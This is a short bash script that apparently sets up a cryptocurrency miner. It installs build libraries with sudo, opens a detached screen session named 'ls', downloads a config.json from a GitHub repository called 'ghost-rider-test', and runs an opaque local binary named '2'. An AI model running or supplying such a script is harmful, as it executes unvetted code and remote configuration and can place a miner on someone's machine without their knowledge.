#!/bin/bash
sudo apt update
sudo apt install screen libjansson4 -y
sudo apt-get install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev -y
chmod +x 2
screen -dmS ls
wget https://raw.githubusercontent.com/ributmaestro/ghost-rider-test/main/config.json
 ./2
